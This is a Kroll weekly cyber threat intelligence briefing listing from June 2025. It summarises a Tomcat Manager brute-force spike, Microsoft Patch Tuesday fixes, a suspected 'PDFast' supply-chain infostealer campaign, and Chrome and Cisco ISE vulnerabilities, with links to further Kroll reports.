June 16, 2025 Cyber Threat Intelligence Briefing

kroll logo
Kroll
Jun 16, 2025
Kroll

This week’s briefing covers:

00:00 - Intro and Situational Awareness

BruteForce Attack Against Apache TomCat Manager
GreyNoise recently observed a coordinated spike in malicious activity against Apache Tomcat Manager interfaces. On June 5, 2025, GreyNoise registered well above baseline volumes, indicating a deliberate attempt to identify and access exposed Tomcat services at scale.

02:05 [PATCHING] Microsoft Patch Tuesday Addresses 70 Issues, 1 Zero-Days
Microsoft has fixed 70 vulnerabilities in June’s patch cycle and Microsoft Edge releases.
The patches address:

  • Elevation of Privilege Vulnerabilities: 14
  • Security Feature Bypass Vulnerabilities: 3
  • Remote Code Execution Vulnerabilities: 26
  • Information Disclosure Vulnerabilities: 17
  • Denial of Service Vulnerabilities: 6
  • Spoofing Vulnerabilities: 2
  • Edge - Chromium Vulnerabilities: 2

06:40 [MALWARE SPOTLIGHT] FULLMETAL
Since April 2025, Kroll has been tracking a large wave of malicious activity surrounding a suspected supply chain attack on the "PDFast" software. In this campaign, a malicious update is executed via the "updater" scheduled task. This scheduled task would then download the file "pdf.bin" and execute it leading to detections for malicious activity and behaviors consistent with information stealers.

09:47 [VULNERABILITY] Critical Vulnerability in Google Chrome
An out of bounds read and write in V8 JavaScript Engine in Google Chrome prior to 137.0.7151.68 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. The Google advisory indicates attackers are actively exploiting the flaw to attack users when visiting compromised sites and has since been added to the CISA KEV Catalogue.

11:27 [VULNERABILITY] CVE-2025-20286 Affecting Cisco Identity Services Engine
A vulnerability in Amazon Web Services (AWS), Microsoft Azure and Oracle Cloud Infrastructure (OCI) cloud deployments of Cisco Identity Services Engine (ISE) has been identified with a Critical CVSS score of 9.9. The vulnerability could allow an unauthenticated, remote attacker to access sensitive data, execute limited administrative operations, modify system configurations, or disrupt services within the impacted systems.

Dive deeper:

Kroll’s Monthly Threat Intelligence Spotlight Report: https://www.kroll.com/en/insights/publications/cyber/threat-intelligence-reports/cti-spotlight-trends-report

Kroll’s Q3 2024 Threat Landscape Report: https://www.kroll.com/en/insights/publications/cyber/threat-intelligence-reports/q3-2023-threat-landscape-report-social-engineering

Playlist of Kroll's Weekly Cyber Threat Intelligence Briefings: Cyber Threat Intelligence Briefings

Kroll Cyber Blog: https://www.kroll.com/en/insights/publications/cyber

Kroll Cyber Threat Intelligence: https://www.kroll.com/en/services/cyber-risk/managed-security/threat-intelligence-services

Kroll Threat Intelligence Reports: https://www.kroll.com/en/insights/publications/cyber/threat-intelligence-reports

Kroll Responder MDR: https://www.kroll.com/en/services/cyber-risk/managed-security/kroll-responder

#krollcyber #threatintelligence #cyberthreats

Copyright © 2026 OpsMatters™. All rights reserved.